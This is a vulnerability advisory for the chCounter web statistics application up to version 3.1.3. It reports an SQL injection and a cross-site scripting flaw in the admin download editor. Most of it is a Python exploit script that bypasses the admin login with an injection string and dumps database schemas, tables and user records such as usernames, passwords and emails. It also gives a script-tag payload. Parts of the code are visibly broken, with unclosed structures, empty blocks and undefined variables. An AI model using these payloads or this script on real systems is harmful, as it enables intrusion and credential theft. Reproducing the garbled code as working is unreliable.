Multiple vulnerabilities in chCounter <= 3.1.3

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Multiple vulnerabilities were found in web application chCounter <= 3.1.3.

- Matias Fontanini(mfontanini@xxxxxxxxxxxxxxxx).

- Downloads must be enabled(this is not default).
- magic_quotes off.
- Access to administration site

Location: administration/index.php?cat=downloads&edit=
Affected parameters: anzahl
Method: POST
Severity: High
Description: When accessing
and using a valid download id, an attacker is able to manipulate the
parameter to perform queries which only involve returning an integer.
The query
output will be sent back to the client in the "anzahl" text input.
Exploit: An attacker could perform repeated crafted requests to retrieve
database records for which the user has access.
Proof of concept: see attached file ""

Location: administration/index.php?cat=downloads&edit=
Affected parameters: anzahl and wert
Method: POST
Severity: Low
Description: When accessing
and using a valid download id, an attacker is able to insert html tags
in the "wert"
parameter. Once the attacker has done that, manupulating "anzahl"
parameter so that
the result sql query is malformed will result in the injected code being
parsed by the
web browser.
Proof of concept: use parameter wert=<script>alert(1);</script>. After
that, use


import sys
import httplib, urllib
import types

lookupString='name="anzahl" value="'

def generateHeaders(host, sessid):
    headers = {'Host':host,
            'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12',
            'Referer':'http://' + host,
    if sessid == '':
        del headers['Cookie']
    return headers

def loginRequest(connection, sessid, host, path):
    headers = generateHeaders(host, sessid)
    params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''})
    connection.request('POST', path + 'administration/index.php', params, headers)
    return connection.getresponse()

def generateSessId(connection, host, path):
    headers = generateHeaders(host, '')
    connection.request('GET', path + 'stats/online_users.php', '', headers)
    response = connection.getresponse()
    cookie = response.getheader('Set-Cookie')
    if type(cookie) is types.NoneType:
        print '[-] Could not get session id. Wrong path?'
    return cookie[10:cookie.find(';')]
def genSessid(host, path):
    print '[+] Trying ' + host + path
    con = connectToHost(host)
    sessid = generateSessId(con, host, path)
    print '[+] Acquired PHPSESSID -> ' + sessid
    con = connectToHost(sys.argv[1])
    output = loginRequest(con, sessid, host, path).read()
    if output.find('login_name') != -1:
        print '[-] Could not bypass login'
    return sessid

def guessLen(sessid, host, field, path, dId, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))

def guessField(sessid, host, path, dId, field, table):
    sz=guessLen(sessid, host, field, path, dId, table)
    headers = generateHeaders(host, sessid)
    while i <= sz: 
        connection = connectToHost(host)
        params = urllib.urlencode({'dl_id':dId,
                                   'timestamp_eintrag':'2010-11-17, 15:43:00',
                                   'timestamp':'2010-11-17, 15:43:00',
                                   'edit_download':'Save entry',
                                   'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'})
        connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
        response = connection.getresponse().read()
        index = response.find(lookupString)
        sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))))
        i += 1

def getValidId(sessid, host, path):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers)
    response = connection.getresponse().read()
    if response.find('ID') == -1:
        print '[-] Downloads seem to be deactivated'
    return int(str(response[index+len('index.php?cat=downloads&amp;edit='):response.find('"', index+len('index.php?cat=downloads&amp;edit='))]))

def getRowCount(sessid, host, path, dId, field, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select count(distinct('+field+')) from '+table+')'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))

def getSchemas(sessid, host, path, dId):	
    rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata')
    print '[+] Schema count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i))
        print ''

def getTables(sessid, host, path, dId):	
    rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables')
    print '[+] Table count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i))
        print ''

def getColumns(sessid, host, path, dId, table):	
    rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'')
    print '[+] Column count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Column name: ')
        guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i))
        print ''

def getItems(sessid, host, path, dId, table, columns, orderby):	
    rows=getRowCount(sessid, host, path, dId, columns[0], table)
    print '[+] Item count: ' + str(rows)
    print '[+] Dump:'
    for i in range(0, rows):
        for col in columns:
            if len(orderby):
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i))
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i))
        print ' || '

def connectToHost(host):
    con = httplib.HTTPConnection(sys.argv[1], 80)
    while tries > 0 and recon == True:
            recon = False
            tries -= 1
    if tries == 0:
        print '[-] Could not establish connection'
    return con

def printHelp():
    print '[-] Usage ' + sys.argv[0] + ' <WEBSERVER> <PATH_TO_CHCOUNTER> <OPTION> [ARGS]'
    print '    OPTION can be:'
    print '                    -t to list all tables'
    print '                    -c <TABLE> to list all columns from table TABLE'
    print '                    -s <TABLE> to list all columns from table TABLE'
    print '                    -i <TABLE> <COLUMNS*> [ORDERBY] to list TABLE:COLUMN items.'
    print '                         COLUMNS* can be a comma-separated list of columns'
    print ''
    print '   Examples:'
    print '   ' + sys.argv[0] + ' /chCounter/ -t'
    print '   ' + sys.argv[0] + ' /chCounter/ -s'
    print '   ' + sys.argv[0] + ' /chCounter/ -c users'
    print '   ' + sys.argv[0] + ' /chCounter/ -i users username,passwd,email'
    print '   ' + sys.argv[0] + ' /chCounter/ -i users username user_id'
    print '                       The last example outputs result ordered by user_id'

if len(sys.argv) < 4:

sessid = genSessid(sys.argv[1], sys.argv[2])
valId = getValidId(sessid, sys.argv[1], sys.argv[2])

if sys.argv[3] == '-t':
    getTables(sessid, sys.argv[1], sys.argv[2], valId)
if sys.argv[3] == '-c':
    if len(sys.argv) < 5:
    getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4])
if sys.argv[3] == '-i':
    if len(sys.argv) < 6:
    if len(sys.argv) == 7:
        orderby = sys.argv[6]
        orderby = sys.argv[6]
    getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby)
if sys.argv[3] == '-s':
    if len(sys.argv) < 4:
    getSchemas(sessid, sys.argv[1], sys.argv[2], valId)


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